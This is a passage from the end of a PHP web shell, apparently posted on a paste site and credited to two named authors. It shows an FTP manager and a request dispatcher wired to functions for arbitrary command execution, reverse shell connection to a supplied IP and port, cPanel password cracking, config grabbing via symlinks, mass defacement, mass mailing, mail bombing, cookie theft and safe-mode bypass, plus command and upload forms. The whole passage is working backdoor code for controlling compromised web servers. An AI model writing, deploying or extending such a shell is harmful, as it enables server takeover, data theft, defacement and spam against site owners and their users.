  1974.     <div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
  1975.     <form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value='   >>   ' /></form></center><br /><br /><hr /><br /><br /></div>
  1976.     <?php
  1977.     }
  1978. }
  1979.  
  1980. function ftp_man_ui()
  1981. {
  1982.     ?>
  1983.     <div id=result><center><h2>FTP Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ftp_host'></td></tr>
  1984.     <tr><td>Username : </td><td><input size=50 name='ftp_user'></td></tr>
  1985.     <tr><td>Password : </td><td><input size=50 name='ftp_pass'></td></tr>
  1986.     <tr><td>Path [<font color=red>Optional</font>] : </td><td><input name='fpath' size=50></td></tr>
  1987.     <tr><td>Upload File From Server [<font color=red>Optional</font>] : </td><td><input name='upload_file' size=50></td></tr>
  1988.     <tr><td>Download File To Server [<font color=red>Optional</font>] : </td><td><input name='download_file' size=50></td></tr>
  1989.     <tr><td></td><td><input type='submit' value='   >>   ' /></form></table></center><br /><br /><hr /><br /><br /></div>
  1990.     <?php
  1991. }
  1992.  
  1993. function ftp_man_bg()
  1994. {
  1995.     echo "<div id=result><center><h2>FTP FILEMANAGER</h2></center><hr />";
  1996.     $fhost=$_GET['ftp_host'];
  1997.     $fuser=$_GET['ftp_user'];
  1998.     $fpass=$_GET['ftp_pass'];
  1999.     $fpath=$_GET['fpath'];
  2000.     $upl=$_GET['upload_file'];
  2001.     $down=$_GET['download_file'];
  2002.     if($fpath=="")
  2003.     {
  2004.         $fpath=ftp_pwd($conn);
  2005.     }
  2006.     $conn=ftp_connect($fhost);
  2007.     if(!$conn)
  2008.     {
  2009.         alert("FTP Host Not Found!!!");
  2010.     }
  2011.     $log=ftp_login($conn, $fuser, $fpass);
  2012.     if(!$log)
  2013.     {
  2014.         alert("FTP Authorication Failed");
  2015.     }
  2016.     if($upl!="")
  2017.     {
  2018.         $fp = fopen($upl, 'r');
  2019.         if (ftp_fput($conn, $upl, $fp, FTP_ASCII))
  2020.         {
  2021.             echo "<center><font color=green>Successfully uploaded <font color=red> $upl </font> </font></center>";
  2022.         }
  2023.         else
  2024.         {
  2025.             echo "<center><font color=red>There was a problem while uploading <font color=green> $upl </font> </font></center>";
  2026.         }
  2027.     }
  2028.     if($down!="")
  2029.     {
  2030.         $handle = fopen($down, 'w');
  2031.         if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0))
  2032.         {
  2033.             echo "<center><font color=green>successfully written to <font color=red> $down </font> </font></center>";
  2034.         }
  2035.         else
  2036.         {
  2037.             echo "<center><font color=red>There was a problem while downloading <font color=green> $down </font> to <font color=green> $down </font> </font></center>";
  2038.         }
  2039.     }
  2040.     echo "<table class='table'><tr><th>Files</th>";
  2041.     ftp_chdir($fpath);
  2042.     $list=ftp_rawlist($conn, $fpath);
  2043.     foreach($list as $fff)
  2044.     {
  2045.         echo "<tr><td><pre>$fff</pre></td></tr>";
  2046.     }
  2047.     echo "</table></div>";
  2048. }
  2049.  
  2050. //////////////////////////////// Frond End Calls ///////////////////////////////
  2051.  
  2052. if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
  2053. {
  2054.     edit_file_bg();
  2055. }
  2056.  
  2057. else if(isset($_REQUEST['sh311_scanner']))
  2058. {
  2059.     shell_finder_ui();
  2060. }
  2061.  
  2062. else if(isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass']))
  2063. {
  2064.     ftp_man_bg();
  2065. }
  2066.  
  2067. else if(isset($_REQUEST['ftpman']))
  2068. {
  2069.     ftp_man_ui();
  2070. }
  2071.  
  2072. else if(isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass']))
  2073. {
  2074.     ssh_man_bg();
  2075. }
  2076.  
  2077. else if(isset($_REQUEST['sshman']))
  2078. {
  2079.     ssh_man_ui();
  2080. }
  2081.  
  2082. else if(isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path']))
  2083. {
  2084.     chdir($_GET['path']);
  2085.     code_in_ui();
  2086. }
  2087.  
  2088. else if(isset($_GET['sh311_scanx']))
  2089. {
  2090.     shell_finder_bg();
  2091. }
  2092.  
  2093. else if(isset($_REQUEST['config_grab']))
  2094. {
  2095.     sym_xxx();
  2096. }
  2097.  
  2098. else if(isset($_REQUEST['ftp_man']))
  2099. {
  2100.     ftp_man_ui();
  2101. }
  2102.  
  2103. else if(isset($_REQUEST['mass_xploit']))
  2104. {
  2105.     mass_deface_ui();
  2106. }
  2107.  
  2108. else if(isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass']))
  2109. {
  2110.     ftp_man_bg();
  2111. }
  2112.  
  2113. else if(isset($_GET['mass_name']) && isset($_GET['mass_cont']))
  2114. {
  2115.     mass_deface_bg();
  2116. }
  2117.  
  2118. else if(isset($_REQUEST['ftp_anon_scan']))
  2119. {
  2120.     ftp_anonymous_ui();
  2121. }
  2122.  
  2123. else if(isset($_GET['ftp_anonz']))
  2124. {
  2125.     ftp_anonymous_bg();
  2126. }
  2127.  
  2128. else if(isset($_REQUEST['killme']))
  2129. {
  2130.     killme();
  2131. }
  2132.  
  2133. else if(isset($_REQUEST['hexenc']))
  2134. {
  2135.     hex_encode_ui();
  2136. }
  2137.  
  2138. else if(isset($_REQUEST['remotefiledown']))
  2139. {
  2140.     remote_download_ui();
  2141. }
  2142.  
  2143. else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
  2144. {
  2145.     remote_download_bg();
  2146. }
  2147.  
  2148. else if(isset($_REQUEST['cpanel_crack']))
  2149. {
  2150.     cpanel_crack();
  2151. }
  2152.  
  2153. else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
  2154. {
  2155.     remote_file_check_bg();
  2156. }
  2157.  
  2158. else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
  2159. {
  2160.     php_ende_bg();
  2161. }
  2162.  
  2163. else if(isset($_REQUEST['remote_server_scan']))
  2164. {
  2165.     remote_file_check_ui();
  2166. }
  2167.  
  2168. else if(isset($_REQUEST['server_exploit_details']))
  2169. {
  2170.     exploit_details();
  2171. }
  2172.  
  2173. else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
  2174. {
  2175.     massmailer_bg();
  2176. }
  2177.  
  2178. else if(isset($_REQUEST['mysqlman']))
  2179. {
  2180.     mysqlman();
  2181. }
  2182.  
  2183. else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
  2184. {
  2185.     mailbomb_bg();
  2186. }
  2187.  
  2188. else if(isset($_REQUEST['cookiejack']))
  2189. {
  2190.     cookie_jack();
  2191. }
  2192.  
  2193. else if(isset($_REQUEST['massmailer']))
  2194. {
  2195.     massmailer_ui();
  2196. }
  2197.  
  2198. else if(isset($_REQUEST['rename']))
  2199. {
  2200.     chdir($_GET['path']);
  2201.     rename_ui();
  2202. }
  2203.  
  2204. else if(isset($_GET['old_name']) && isset($_GET['new_name']))
  2205. {
  2206.     chdir($_GET['path']);
  2207.     rename_bg();
  2208. }
  2209.  
  2210. else if(isset($_REQUEST['encodefile']))
  2211. {
  2212.     php_ende_ui();
  2213. }
  2214.  
  2215. else if(isset($_REQUEST['edit']))
  2216. {
  2217.     edit_file();
  2218. }
  2219.  
  2220. else if(isset($_REQUEST['down']) && isset($_REQUEST['path']))
  2221. {
  2222.     download();
  2223. }
  2224.  
  2225. else if(isset($_REQUEST['gzip']) && isset($_REQUEST['path']))
  2226. {
  2227.     download_gzip();
  2228. }
  2229.  
  2230. else if(isset($_REQUEST['read']))
  2231. {
  2232.     chdir($_GET['path']);
  2233.     code_viewer();
  2234. }
  2235.  
  2236. else if(isset($_REQUEST['perm']))
  2237. {
  2238.     chdir($_GET['path']);
  2239.     ch_perm_ui();
  2240. }
  2241.  
  2242. else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
  2243. {
  2244.     chdir($_GET['path']);
  2245.     ch_perm_bg();
  2246. }
  2247.  
  2248. else if(isset($_REQUEST['del_fil']))
  2249. {
  2250.     chdir($_GET['path']);
  2251.     delete_file();
  2252.     exit;
  2253. }
  2254. else if(isset($_REQUEST['phpinfo']))
  2255. {
  2256.     chdir($_GET['path']);
  2257.     ob_clean();
  2258.     echo phpinfo();
  2259.     exit;
  2260. }
  2261. else if(isset($_REQUEST['del_dir']))
  2262. {
  2263.     chdir($_GET['path']);
  2264.     $d_dir=$_GET['del_dir'];
  2265.     deldirs($d_dir);
  2266. }
  2267. else if(isset($_GET['path']) && isset($_GET['new_file']))
  2268. {
  2269.     chdir($_GET['path']);
  2270.     mk_file_ui();
  2271. }
  2272. else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
  2273. {
  2274.     mk_file_bg();
  2275. }
  2276. else if(isset($_GET['path']) && isset($_GET['new_dir']))
  2277. {
  2278.     chdir($_GET['path']);
  2279.     create_dir();
  2280. }
  2281. else if(isset($_GET['path']) && isset($_GET['cmdexe']))
  2282. {
  2283.     chdir($_GET['path']);
  2284.     cmd();
  2285. }
  2286. else if(isset($_POST['upload_f']) && isset($_POST['path']))
  2287. {
  2288.     upload_file();
  2289. }
  2290. else if(isset($_REQUEST['rs']))
  2291. {
  2292.     reverse_conn_ui();
  2293. }
  2294. else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
  2295. {
  2296.     reverse_conn_bg();
  2297. }
  2298. else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
  2299. {
  2300.     chdir($_GET['path']);
  2301.     safe_mode_fuck_ui();
  2302. }
  2303. else if(isset($_GET['path']) && isset($_GET['safe_mode']))
  2304. {
  2305.     safe_mode_fuck();
  2306. }
  2307. else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
  2308. {
  2309.     AccessDenied();
  2310. }
  2311.  
  2312. else if(isset($_REQUEST['symlink']))
  2313. {
  2314.     sym_link();
  2315. }
  2316.  
  2317. else if(isset($_GET['path']) && isset($_GET['copy']))
  2318. {
  2319.     copy_file_ui();
  2320. }
  2321. else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
  2322. {
  2323.     copy_file_bg();
  2324. }
  2325. else
  2326. {
  2327.     filemanager_bg();
  2328. }
  2329.  
  2330. ////////////////////////////// End Frond End Calls //////////////////////////////
  2331.  
  2332. echo "</div><div id=result><center><p><table class='tbl'>
  2333.      <tr><td><form method='GET'>PWD : <input size='50' name='path' value=".getcwd()."><input type='submit' value='   >>   ' /></form></td></tr></table>
  2334.      <table class='tbl'><tr>
  2335.          <td><form style='float:right;' method='GET'><input name='path' value=".getcwd()." type=hidden><span> New File : </span><input type='submit' value='   >>   ' ><input size='40' name='new_file' /></form>
  2336.          </td>
  2337.          <td><form  style='float:left;' method='GET'><input name='path' value=".getcwd()." type=hidden><input size='40' name='new_dir'><input type='submit' value='   >>   ' /><span> : New Dir</span></form>
  2338.          </td>
  2339.      </tr>
  2340.      <tr>
  2341.          <td><form style='float:right;' method='GET'><input style='float:left;' name='path' value=".getcwd()." type=hidden><span>CMD : </span><input type='submit' value='   >>   ' ><input name='cmdexe' size='40' /></form>
  2342.          </td>
  2343.          <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value=".getcwd()." type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value='   >>   ' /><span> : Upload File</span></form>
  2344.          </td>
  2345.        </tr>
  2346.      </table></p><p><font size=4 color=green>&copy <a style='color:green; text-decoration:none;' href=http://facebook.com/ajithkp560>AJITH KP</a> & <a style='color:green; text-decoration:none;' href='http://www.facebook.com/vishnunathkp'>VISHNU NATH KP</a> &copy</font><br />&reg TOF [2012] &reg</div>"
  2347. ?>
Add Comment
Please, Sign In to add comment